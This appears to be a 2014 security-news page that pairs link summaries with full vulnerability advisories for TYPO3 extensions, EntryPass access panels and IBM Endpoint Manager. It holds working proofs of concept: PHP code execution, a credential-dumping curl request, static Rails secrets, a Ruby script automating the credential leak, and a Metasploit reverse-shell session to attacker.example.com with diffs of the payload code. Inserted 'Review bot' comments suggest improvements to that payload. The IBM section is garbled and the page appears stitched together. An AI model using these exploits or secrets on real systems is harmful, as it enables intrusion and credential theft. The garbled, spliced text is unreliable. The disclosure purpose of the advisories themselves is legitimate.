November 30, 2014, 1:51 pm
TL;DR I use a race condition to upload two avatars at the same time to exploit another Paperclip bug and get remote code execution on Apache+Rails stacks. I believe many file uploaders are vulnerable to this.
more here.........http://homakov.blogspot.gr/2014/11/hacking-file-uploaders-with-race.html
November 30, 2014, 1:53 pm
This tutorial will cover several techniques that can be used to gain persistent access to Windows machines. Usually this doesn't come into play during a pentest (with the exception of red team engagements), as there is no benefit to adding it to the scope of the project. That is not to say it is not an interesting subject, both from a defensive and an offensive perspective.
more here...........http://www.fuzzysecurity.com/tutorials/19.html
December 1, 2014, 3:22 am
New vulnerabilities for old operating systems may not seem particularly interesting, until you consider the large number of legacy machines running outdated versions of Windows. Windows XP has reached its end of life, meaning that new vulnerabilities will not be patched. In this post, we will show that a recent vulnerability can be used as a platform for exploiting Windows XP.
more here.........http://blogs.cisco.com/security/talos/ms14-063-a-potential-xp-exploit
December 1, 2014, 3:23 am
Finally, after one year, I'm releasing two new codes. I worked on them originally to contribute to DC issue 6, but things have turned rather complicated with the zine so far. I worked on them under rather exceptional circumstances: almost no available material, a bad internet connection, no resources, and worst of all, little computer access and almost no time. After a few setbacks on my original plans, I had to cut them short for simplicity. But they are fit for release. So, with no further delay, here are some descriptions.
more here.............http://villekullah.tumblr.com/post/104057844668/hauhra-and-hildr-release
December 1, 2014, 3:24 am
So we’re back, ready to run through an additional step of our Verisure Wireless alarm journey. This post is the second chapter of my Verisure story, where we’ll learn how to extract and dig into firmwares. Getting the firmware out of the memory will actually help us grab various AES keys, a required step to decrypt both radio and ethernet communications, but also for authenticating against the local console using the USB connector (this will be described in part 3).
more here.........http://funoverip.net/2014/12/reverse-engineer-a-verisure-wireless-alarm-part-2-firmwares-and-crypto-keys/
December 1, 2014, 3:27 am
A "How'd that malware get there?" tool for OS X
more here..........https://github.com/Yelp/osxcollector
December 1, 2014, 3:50 am
One of the many ways to look for Exploit Kit/drive-by behavior
more here.........https://github.com/sooshie/bro-scripts/tree/master/exploitkit
December 1, 2014, 6:17 am
FireEye is currently tracking a group that targets the email accounts of individuals privy to the most confidential information of more than 100 companies. The group, which we call FIN4, appears to have a deep familiarity with business deals and corporate communications, and their effects on financial markets. Operating since at least mid-2013, FIN4 distinctly focuses on compromising the accounts of individuals who possess non-public information about merger and acquisition (M&A) deals and major market-moving announcements, particularly in the healthcare and pharmaceutical industries.
more here...........https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-fin4.pdf
December 1, 2014, 6:20 am
Advisory: Remote Code Execution in TYPO3 Extension ke_dompdf

During a penetration test RedTeam Pentesting discovered a remote code execution vulnerability in the TYPO3 extension ke_dompdf, which allows attackers to execute arbitrary PHP commands in the context of the webserver.

Details
=======

Product: ke_dompdf TYPO3 extension
Affected Versions: 0.0.3<=
Fixed Versions: 0.0.5
Vulnerability Type: Remote Code Execution
Security Risk: high
Vendor URL: http://typo3.org/extensions/repository/view/ke_dompdf
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-007
Advisory Status: published
CVE: CVE-2014-6235
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6235

Introduction
============

"DomPDF library and a small pi1 to show how to use DomPDF to render the current typo3-page to pdf."

(taken from the extension's description)

More Details
============

The TYPO3 extension ke_dompdf contains a version of the dompdf library including all files originally supplied with it. This includes an examples page, which contains different examples for HTML-entities rendered as a PDF. This page also allows users to enter their own HTML code into a text box to be rendered by the webserver using dompdf. dompdf also supports rendering of PHP files and the examples page also accepts PHP code tags, which are then executed and rendered into a PDF on the server.

Since those files are not protected in the TYPO3 extension directory, anyone can access this URL and execute arbitrary PHP code on the system. This behaviour was already fixed in the dompdf library, but the typo3 extension ke_dompdf supplies an old version of the library that still allows the execution of arbitrary PHP code.

Proof of Concept
================

Access examples.php on the vulnerable system:

http://www.example.com/typo3conf/ext/ke_dompdf/res/dompdf/www/examples.php

Enter PHP code in the text box on the bottom of the page and click the submit button, for example:

------------------------------------------------------------------------
<?php phpinfo() ?>
------------------------------------------------------------------------

The page will return a PDF file containing the output of the PHP code.

Workaround
==========

Remove the directory "www" containing the examples.php file or at least the examples.php file from the extension's directory.

Fix
===

Update to version 0.0.5 of the extension.

Security Risk
=============

high

Timeline
========

2014-04-21 Vulnerability identified
2014-04-30 Customer approved disclosure to vendor
2014-05-06 CVE number requested
2014-05-10 CVE number assigned
2014-05-13 Vendor notified
2014-05-20 Vendor works with TYPO3 security team on a fix
2014-09-02 Vendor released fixed version [2]
2014-12-01 Advisory released

References
==========

The TYPO3 extension ke_dompdf contains an old version of the dompdf library, which contains an example file that can be used to execute arbitrary commands. This vulnerability was fixed in dompdf in 2010. The relevant change can be found in the github repository of dompdf:

[1] https://github.com/dompdf/dompdf/commit/e75929ac6393653a56e84dffc9eac1ce3fb90216

TYPO3-EXT-SA-2014-010: Several vulnerabilities in third party extensions:

[2] http://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2014-010/

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
December 1, 2014, 6:24 am
Advisory: Information Disclosure in TYPO3 Extension ke_questionnaire

The TYPO3 extension ke_questionnaire stores answered questionnaires in a publicly reachable directory on the webserver with filenames that are easily guessable.

Details
=======

Product: ke_questionnaire
Affected Versions: 2.5.2 (possibly all versions)
Fixed Versions: unknown
Vulnerability Type: Information Disclosure
Security Risk: medium
Vendor URL: http://kequestionnaire.kennziffer.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-009
Advisory Status: published
CVE: CVE-2014-8874
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8874

Introduction
============

"The TYPO3 extension kequestionnaire allows to easily and quickly create and evaluate individual questionnaires online in any TYPO3 website."

(translated from the official website of ke_questionnaire)

More Details
============

Files containing the answered questionnaires are stored in the "typo3temp" directory within the TYPO3 installation. As the source code of the ke_questionnaire extension shows, the filename of an answered questionnaire is solely based on the questionnaire ID and the user ID of the user who created the questionnaire.

Source code (shortened):

------------------------------------------------------------------------------
function init() {
    global $BE_USER,$LANG,$BACK_PATH,$TCA_DESCR,$TCA,$CLIENT,$TYPO3_CONF_VARS;
    $this->temp_file = 'tx_kequestionnaire_temp_'.$this->q_id.'_'.$GLOBALS['BE_USER']->user['uid'];
    [...]
}

[...]

function createSchedulerTask(){
    $myVars = $GLOBALS['BE_USER']->getSessionData('tx_kequestionnaire');
    $file_path = PATH_site.'typo3temp/'.$this->temp_file;
    [...]
}
------------------------------------------------------------------------------

A valid URL that returns the answers to a questionnaire could look like the following:

http://www.example.com/typo3temp/tx_kequestionnaire_temp_15999_7

Proof of Concept
================

Using the tool wfuzz[1] it is possible to search for answers to questionnaires on a TYPO3 site that employs ke_questionnaire:

------------------------------------------------------------------------
$ python wfuzz.py -c -z range,14000-15000 -z range,1-10 --hc 301 \
    http://example.com/typo3temp/tx_kequestionnaire_temp_FUZZ_FUZ2Z
------------------------------------------------------------------------

Workaround
==========

The webserver config should deny access to answered questionnaire files, for example by adding an .htaccess file that limits access to tx_kequestionnaire_* files (this may hinder online evaluation of the questionnaires).

Fix
===

No official fix available.

Security Risk
=============

Depending on the questions in the questionnaire the answered questionnaires may contain personal information including participants' full names, addresses and so on. The risk therefore strongly depends on the information supplied in the questionnaires. Since this information will at least often contain email addresses, it is rated as at least a medium risk.

Timeline
========

2014-04-21 Vulnerability identified
2014-04-30 Customer approved disclosure to vendor
2014-05-13 Vendor notified
2014-05-20 Vendor works with TYPO3 security team on a fix
2014-06-15 Vendor releases updated version which according to them does not fix the issue
2014-10-08 TYPO3 security team says the issue is still unresolved
2014-11-04 Vendor continues to release updated versions, no response whether the security issue is fixed
2014-11-14 CVE number assigned
2014-12-01 Advisory released

References
==========

[1] https://code.google.com/p/wfuzz/
December 1, 2014, 6:30 am
Advisory: EntryPass N5200 Credentials Disclosure

EntryPass N5200 Active Network Control Panels allow the unauthenticated downloading of information that includes the current administrative username and password.

Details
=======

Product: EntryPass N5200 Active Network Control Panel
Affected Versions: unknown
Fixed Versions: not available
Vulnerability Type: Information Disclosure, Credentials Disclosure
Security Risk: high
Vendor URL: http://www.entrypass.net/w3v1/products/active-network/n5200
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-011
Advisory Status: published
CVE: CVE-2014-8868
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8868

Introduction
============

"EntryPass Active Networks are designed to enhance highly customized and rapid 'real-time' changes to the underlying network operation. Brilliantly engineered with all the power you need to enable code-sending, minus unnecessary buffer time with its distributed architecture capable of processing access demand at the edge level without leveraging at the server end."

(From the vendor's home page)

More Details
============

EntryPass N5200 Active Network Control Panels offer an HTTP service on TCP port 80. It appears that only the first character of a requested URL's path is relevant to the web server. For example, requesting the URL

http://example.com/1styles.css

yields the same CSS file as requesting the following URL:

http://example.com/1redteam

By enumerating all one-character long URLs on a device, it was determined that URLs starting with a numeric character are used by the web interface, as listed in the following table:

http://example.com/0    Index
http://example.com/1    Stylesheet
http://example.com/2    Authentication with Username/Password
http://example.com/3    Session Management
http://example.com/4    Device Status
http://example.com/5    Progressbar Image
http://example.com/6    Reset Status
http://example.com/7    Login Form
http://example.com/8    HTTP 404 Error Page
http://example.com/9    JavaScript

For URLs starting with non-numeric characters, an HTTP 404 - Not Found error page is normally returned. Exceptions to this rule are URLs starting with the lower case letters o to z and the upper case letters A to D. When requesting these URLs, memory contents from the device appear to be returned in the server's HTTP response.

As highlighted in the following listing, both the currently set username ADMIN and the corresponding password 123456 are disclosed in the memory contents when requesting the URL http://example.com/o:

$ curl -s http://example.com/o | hexdump -C | head
[...]
0010  XX XX XX XX XX XX XX XX  XX XX XX 77 77 77 2e 65  |XXXXXXXXXXXwww.e|
0020  6e 74 72 79 70 61 73 73  2e 6e 65 74 00 00 00 00  |ntrypass.net....|
[...]
0060  XX XX XX XX XX XX XX XX  XX XX 41 44 4d 49 4e 26  |XXXXXXXXXXADMIN&|
0070  20 20 31 32 33 34 35 36  26 20 XX XX XX XX XX XX  | 123456& XXXXXX|
[...]

These credentials grant access to the administrative web interface of the device when using them in the regular login form.

Similarly, it is possible to get the status output of the device without prior authentication by simply requesting the following URL

http://example.com/4

The server responds to the request with the following XML data, which contains information about various different settings of the device.

<html><head><title>Device Server Manager</title></head><body>
<serial_no>XXXXXXXXXXXX-XXXX</serial_no>
<firmware_version>HCB.CC.S1.04.04.11.02 -N5200[64Mb]</firmware_version>
<mac_address>XX-XX-XX-XX-XX-XX</mac_address>
<disable_reporting>disabled</disable_reporting>
<commit_setting>checked</commit_setting>
<user_id>ADMIN</user_id>
<user_pass>******</user_pass>
[...]
</body></html>

Proof of Concept
================

------------------------------------------------------------------------
$ curl -s http://example.com/o | hexdump -C | head
------------------------------------------------------------------------

Workaround
==========

Access to the web interface should be blocked at the network layer.

Fix
===

Not available.

Security Risk
=============

Attackers with network access to an EntryPass N5200 Active Network Control Panel can retrieve memory contents from the device. These memory contents disclose the currently set username and password needed to access the administrative interface of the device. Using these credentials, it is possible to read the device's current status and configuration, as well as modify settings and install firmware updates. With regards to the device itself, this vulnerability poses a high risk, as it allows attackers to gain full control. The actual operational risk depends on how the device is used in practice.

Timeline
========

2014-05-19 Vulnerability identified
2014-08-25 Customer approved disclosure to vendor
2014-08-27 Vendor contacted, security contact requested
2014-09-03 Vendor contacted, security contact requested
2014-09-15 Vendor contacted, vulnerability reported
2014-09-17 Update requested from vendor, no response
2014-10-15 No response from vendor. Customer discontinued use of the product and approved public disclosure
2014-10-20 Contacted vendor again since no fix or roadmap was provided.
2014-10-28 CVE number requested
2014-11-14 CVE number assigned
2014-12-01 Advisory released
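The enumeration the advisory describes, as an added Ruby example that is not part of RedTeam Pentesting's advisory or of any vendor code: request every one-character path, treat any body that differs from the device's own 404 page (served at /8) as interesting, and pull printable runs out of it the way strings(1) would. The sample responses are constructed here to mirror the hexdump above, not captured from a device; `http_fetch` is the only part that touches the network and is not exercised by the demo. The credential format seen in the dump ("ADMIN&  123456&") is left for the reader to spot in the output rather than hard-coded, since the advisory shows only one sample of it.

```ruby
# Added example, not from the advisory: enumerate one-character paths on an
# EntryPass-style web server and extract printable runs from responses that
# are not the device's own 404 page. Network access is isolated in http_fetch;
# the demo at the bottom runs against constructed sample responses only.
require 'net/http'
require 'uri'

# Every one-character path the advisory enumerated: digits are the web UI,
# letters are where memory contents came back.
CANDIDATE_PATHS = (('0'..'9').to_a + ('a'..'z').to_a + ('A'..'Z').to_a).map { |c| "/#{c}" }

# Real fetcher: returns the response body as a binary string. Assumes plain
# HTTP on port 80 as in the advisory; not exercised by the demo.
def http_fetch(base_url)
  ->(path) { Net::HTTP.get_response(URI.join(base_url, path)).body.to_s.b }
end

# Same idea as strings(1): runs of printable ASCII at least min_len bytes long.
def printable_strings(bytes, min_len = 6)
  bytes.b.scan(/[\x20-\x7e]{#{min_len},}/)
end

# Request each non-numeric one-character path and keep the ones whose body is
# not the 404 page served at /8. Returns { path => [printable strings] }.
def enumerate_leaks(fetch, min_len = 6)
  not_found = fetch.call('/8')
  CANDIDATE_PATHS.each_with_object({}) do |path, leaks|
    next if path =~ %r{^/\d$}          # 0-9 are the regular interface pages
    body = fetch.call(path)
    next if body == not_found
    leaks[path] = printable_strings(body, min_len)
  end
end

# Constructed sample responses modelled on the hexdump in the advisory; not
# captured from a device. Only /1 and /o return something other than the 404 page.
SAMPLE_404 = '<html><body>404 Not Found</body></html>'.b
SAMPLE_MEMORY = ("\x00\x01\x02\xff".b * 3) +
                "www.entrypass.net\x00\x00\x00\x00".b +
                ("\xde\xad\xbe\xef".b * 2) +
                'ADMIN&  123456& '.b +
                "\x7f\x80\x00".b
FAKE_FETCH = lambda do |path|
  case path
  when '/1' then 'body { color: #000; }'.b
  when '/o' then SAMPLE_MEMORY
  else SAMPLE_404
  end
end

if __FILE__ == $0
  # Swap FAKE_FETCH for http_fetch('http://192.0.2.1/') to run against a real device.
  enumerate_leaks(FAKE_FETCH).each do |path, strings|
    puts "#{path}: #{strings.inspect}"
  end
end
```

Comparing against the body of /8 rather than the HTTP status matters here because, as the advisory notes, the device answers non-numeric paths with its own 404 page, so a status-code check alone would not separate the leaking paths from the rest.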
December 1, 2014, 9:29 am
Assuming that enough time has passed since the security updates were released by WordPress and Drupal, we want to share our research. As you already know, we believe in Responsible Disclosure and that is the reason why we didn't publish this post before.
more here...........http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html
December 1, 2014, 9:31 am
CF9-10 Remote Root Zeroday
more here........http://downloads.securityfocus.com/vulnerabilities/exploits/59773.py
December 2, 2014, 3:07 am
Inspired by Nikolay Elenkov’s detailed technical posts on Android Explorations, I decided to dig into the Android source code myself and document the package verification mechanism in Android.
more here..........https://irq5.io/2014/12/01/android-internals-package-verifiers/
December 2, 2014, 4:12 am
I’ve spent a lot of time this year thinking about networking, the web, and security on the Internet. Since the Snowden leaks, revelations about the scale and sophistication of government cyberweapons have the public talking about the danger of metadata collection. In response, I began to wonder how easy it would be for any would-be adversary to perform a practical collection attack on a standard WiFi network. In order to judge the difficulty for myself, I decided it was time to dabble in the Dark Arts.
more here...........http://blog.nodenexus.com/2014/11/28/a-shark-on-the-network/
December 2, 2014, 6:50 am
Advisory: Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components

During a penetration test, RedTeam Pentesting discovered that several IBM Endpoint Manager Components are based on Ruby on Rails and use static secret_token values. With these values, attackers can create valid session cookies containing marshalled objects of their choosing. This can be leveraged to execute arbitrary code when the Ruby on Rails application unmarshals the cookie.

Details
=======

Product: IBM Endpoint Manager for Mobile Devices
Affected Components: Enrollment and Apple iOS Management Extender, Mobile Device Management Self-Service Portal, Mobile Device Management Admin Portal and Trusted Service Provider
Affected Versions: All versions prior to 9.0.60100
Fixed Versions: 9.0.60100
Vulnerability Type: Unauthenticated Remote Code Execution
Security Risk: high
Vendor URL: http://www-03.ibm.com/software/products/en/ibmendpmanaformobidevi
            http://www-01.ibm.com/support/docview.wss?uid=swg21691701
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-012
Advisory Status: published
CVE: CVE-2014-6140
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6140

Introduction
============

"IBM Endpoint Manager for Mobile Devices provides a completely integrated approach for managing, securing, and reporting on laptops, desktops, servers, smartphones, tablets, and even specialty devices such as point-of-sale terminals. This provides customers with unprecedented real-time visibility and control over all devices employees use in their daily job functions; reducing costs, increasing productivity, and improving compliance."

(from the vendor's homepage)

More Details
============

IBM Endpoint Manager for Mobile Devices is part of the IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) product family. Several components related to mobile device management can be installed either on the main TEM Server, or on so-called TEM Relays, and are then accessible via HTTPS at port 443 of the respective system, such as:

Path    Component
/       Enrollment and Apple iOS Management Extender
/ssp/   Mobile Device Management Self-Service Portal
/ap/    Mobile Device Management Admin Portal
/tsp/   Trusted Service Provider

When issuing HTTP requests to any of these paths, the respective server responds in a manner similar to the following example:

$ curl -skI https://tem.example.com/
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
X-UA-Compatible: IE=Edge,chrome=1
[...]
Set-Cookie: _mdm_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZjYTIxNjUwODg1ODFiMTYxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMTQ2S2V3blNnQ1cxeGpaN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg%3D%3D--e48265ee63dd90381caa92248d27162f67b1ea06; path=/; secure; HttpOnly
[...]
X-Rack-Cache: miss
Content-Length: 0
Server: Jetty(8.1.14.v20131031)

While the Server header indicates that the web applications are hosted on a Jetty Java application server, the X-Rack-Cache header and the cookie format are typically used by Ruby on Rails applications. The cookie is in fact a Base64 encoded marshalled Ruby object protected by an HMAC (the hexadecimal value following the two dashes). The cookie value can be unmarshalled as follows:

$ ruby -e 'puts Marshal.load("BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZj'\
'YTIxNjUwODg1ODFiMTYxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiM'\
'TQ2S2V3blNnQ1cxeGpaN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg==".'\
'unpack("m0")[0])'
{"session_id"=>"8cf6ca2165088581b161cafa0a604837", "_csrf_token"=>"46KewnSgCW1xjZ7XR3HK265eAiOmkl1o/daRN5x3v94="}

To create a cookie with a valid HMAC requires knowledge of a secret stored on the application server. In Ruby on Rails version 3 applications, this value is normally stored in the variable secret_token that is set in the file config/initializers/secret_token.rb. It is good practice to generate these values randomly when an application is installed. The IBM Endpoint Manager components, however, use static values that are the same across all installations. These values can be determined by manually inspecting the web application archives (e.g. ap.war, ios.war, ssp.war, tsp.war) installed into the directory

C:\Program Files\BigFix Enterprise\Management Extender\MDM Provider\webapps

of the respective server. The Enrollment and Apple iOS Management Extender, for example, is contained in the file ios.war. The archive contains a Ruby on Rails web application that was compiled to Java class files. The secret token needed for calculating the HMAC is contained in the file WEB-INF/config/initializers/secret_token.class:

$ strings WEB-INF/config/initializers/secret_token.class \
    | egrep -o '[0-9a-f]{128}'
65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365

It can be verified that this secret is used for generating the HMAC that protects the cookie value by using the OpenSSL command line utility to calculate an HMAC of the aforementioned Base64 encoded data:

$ echo -n 'BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZjYTIxNjUwODg1ODFiMT'\
'YxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMTQ2S2V3blNnQ1cxeG'\
'paN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg=='\
    | openssl dgst -sha1 -hmac '65c0eb133b2c8481b08b41cfc0969cbdd540f3c1'\
'ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd'\
'4895a4e2805712fa6365'
(stdin)= e48265ee63dd90381caa92248d27162f67b1ea06

The resulting value is identical to the HMAC originally appended to the cookie. Once the secret is known, arbitrary cookie values can be crafted and sent to the respective application for further processing. As demonstrated by Metasploit's rails_secret_deserialization exploit module[0], this can be leveraged into executing arbitrary code on the application server (see also Proof of Concept below).

For reference, the following cookie names and secret_token values were identified for the different web applications:

Enrollment and Apple iOS Management Extender
Path:   /
Cookie: _mdm_session
Secret: 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365

Mobile Device Management Self-Service Portal
Path:   /ssp/
Cookie: _self-service-portal_session
Secret: c5f5da7e3ae1baa9a10f4429b5e7c8aec217b3b53851272bd8f533d47acade480863a810630039c7987b04ff70c125512e74a998f8a028080c05265a97c747a3

Mobile Device Management Admin Portal
Path:   /ap/
Cookie: _admin-portal_session
Secret: 2556dea5fbbd90c4a79202a43bdf9bd4c391c67159d021ea8bc478f29801d02478acb273c2f425cf487c27669af5dbc3fdaf7f870e23a0a544dee04ab2169220

Trusted Service Provider
Path:   /tsp/
Cookie: _trusted-services-provider_session
Secret: b52a3979462299e3a11f6c7c893a980f312fa8e5944fb8fdc74a400c55677aedba00ce6df9e2d9ef1525c6ab68a2b6dca9e9ba557c0c6d579a1325ec6338178b

Exploiting the Trusted Service Provider application was not tested, due to the lack of a properly configured testing environment. However, it is a Ruby on Rails web application deployed to the Jetty application server just like the other applications so that it is likely also vulnerable. This was confirmed by the vendor.

Proof of Concept
================

The following listing shows a sample Metasploit session demonstrating the execution of arbitrary code through the Enrollment and Apple iOS Management Extender application:

------------------------------------------------------------------------
msf > use exploit/multi/http/rails_secret_deserialization
msf exploit(rails_secret_deserialization) > set PAYLOAD ruby/shell_reverse_tcp
PAYLOAD => ruby/shell_reverse_tcp
msf exploit(rails_secret_deserialization) > set LHOST attacker.example.com
LHOST => attacker.example.com
msf exploit(rails_secret_deserialization) > set RHOST tem.example.com
RHOST => tem.example.com
msf exploit(rails_secret_deserialization) > set RPORT 443
RPORT => 443
msf exploit(rails_secret_deserialization) > set SSL true
SSL => true
msf exploit(rails_secret_deserialization) > set SSLVERSION TLS1
SSLVERSION => TLS1
msf exploit(rails_secret_deserialization) > set SECRET 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365
SECRET => 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365
msf exploit(rails_secret_deserialization) > set PrependFork false
PrependFork => false
msf exploit(rails_secret_deserialization) > exploit
[*] Started reverse handler on attacker.example.com:4444
[*] Checking for cookie
[*] Adjusting cookie name to _mdm_session
[+] SECRET matches!
Sending exploit payload[*] Sending cookie _mdm_session[*] Command shell session 1 opened (attacker.example.com:4444 -> tem.example.com:50169) at 2014-08-15 13:37:31 +0200cmd.exe /c verwhoamiMicrosoft Windows [Version 6.1.7601]nt authority\system------------------------------------------------------------------------The following changes needed to be applied to the Metasploit Frameworkto be able to exploit the issue. Most of them were required to addresspeculiarities of the Java/JRuby environment, such as the lack of supportfor Kernel.fork():------------------------------------------------------------------------diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rbindex 7803dd5..e72d8c2 100644--- a/modules/exploits/multi/http/rails_secret_deserialization.rb+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb@@ -141,20 +141,25 @@ class Metasploit3 < Msf::Exploit::Remote #- # This stub ensures that the payload runs outside of the Rails process- # Otherwise, the session can be killed on timeout+ # This stub tries to ensure that the payload runs outside of the Rails+ # process Otherwise, the session can be killed on timeout # def detached_payload_stub(code) %Q^ code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first- if RUBY_PLATFORM =~ /mswin|mingw|win32/- inp = IO.popen("ruby", "wb") rescue nil- if inp- inp.write(code)- inp.close- end+ if RUBY_PLATFORM =~ /mswin|mingw|win32/ and inp = (IO.popen("ruby", "wb") rescue nil)+ inp.write(code)+ inp.close else- Kernel.fork do+ def _fork+ begin+ Kernel.fork+ rescue NotImplementedError+ -1+ end+ end+ pid = _fork+ if 0 == pid or -1 == pid eval(code) end end@@ -234,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => datastore['HTTP_METHOD'], }, 25) if res && !res.get_cookies.empty?- match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /)+ match = 
res.get_cookies.match(/([_A-Za-z0-9-]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+);/) end if matchdiff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rbindex f17c669..0100929 100644--- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb+++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb@@ -37,8 +37,31 @@ module Metasploit3 def ruby_string lhost = datastore['LHOST'] lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)- "require 'socket';c=TCPSocket.new(\"#{lhost}\", #{datastore['LPORT'].to_i});" +- "$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;" +- "(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }"+ ruby = <<-EOF+require 'socket'+c=TCPSocket.new("#{lhost}", #{datastore['LPORT'].to_i})+def reopen(old, new)+ begin+ old.reopen(new)+ rescue IOError => e+ new+ end+end++$stdin = reopen($stdin, c)+$stdout = reopen($stdout, c)+$stderr = reopen($stderr, c)+$stdin.each_line{ |l| l=l.strip++ next if l.length==0++ (IO.popen(l,"rb") { |fd|+ fd.each_line { |o|+ c.puts(o.strip)+ }+ }) rescue nil+}+ EOF+ ruby end end------------------------------------------------------------------------Workaround==========It might be possible to binary patch the Java class files to use adifferent secret_token value and redeploy the application. This isuntested, however.Fix===Install version 9.0.60100 of the affected software components.Security Risk=============The vulnerability allows unauthenticated remote attackers to executearbitrary code with administrative privileges on the affected systems.It is highly likely that a successful attack on the application servercan also be leveraged into a full compromise of all devices managedthrough the product. 
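Review bot: in the detached_payload_stub hunk, the `-1 == pid` branch (Kernel.fork raising NotImplementedError, which is exactly the JRuby case this change targets) runs `eval(code)` inline in the Rails request thread, so the reverse-shell loop in the payload blocks the request and the timeout kill the comment warns about is still possible; `Thread.new { eval(code) }` for that branch would let the request complete while the payload keeps running. Two smaller points: the rewritten comment lost its sentence break ("process Otherwise"), and `def _fork` inside eval'd code leaves a method on Object in the target process where a lambda would not.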
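Review bot: the cookie regex in the second hunk still requires a literal `;` after the HMAC, so a Set-Cookie whose signed cookie is the last (or only) item without trailing attributes does not match and `match` stays nil; `--([0-9A-Fa-f]+)(?:;|$)` keeps the stricter form and also accepts that case. Allowing `-` in the cookie name is needed for `_self-service-portal_session` and the other names listed in the advisory, so that part of the change is right.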
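Review bot: in the shell_reverse_tcp.rb hunk, `reopen` is defined with a top-level `def` inside the payload, so it becomes a private method on every object in the target process for the lifetime of the Rails application; a lambda (`reopen = lambda { |old, new| ... }`) gives the same fallback without that footprint. Also, when `old.reopen(new)` raises and the rescue returns `new`, only the Ruby globals `$stdin`/`$stdout`/`$stderr` are rebound, not file descriptors 0-2, so a child started via `IO.popen` still inherits the original descriptors; this is harmless here only because output is written explicitly with `c.puts`, and a comment saying so would help the next reader.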
This constitutes a high risk.

Timeline
========

2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-08-15 Vendor notified, vendor acknowledges receiving the advisory
2014-09-03 Update requested from vendor
2014-09-05 Vendor promises to respond with more details
2014-09-26 Update requested from vendor
2014-09-30 Vendor promises to respond with more details
2014-10-16 Update requested from vendor
2014-10-16 Vendor responds with CVE-ID, plans release for mid-November
2014-11-06 More definite release schedule requested
2014-11-12 Vendor plans release for last week of November
2014-11-21 Additional details requested from vendor
2014-11-22 Vendor responds with details, postpones release to mid-December due to issues discovered during quality control
2014-12-01 Vendor announces imminent release
2014-12-01 Vendor releases security bulletin and software upgrade
2014-12-02 Customer approves public disclosure
2014-12-02 Advisory released

References
==========

[0] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/rails_secret_deserialization.rb
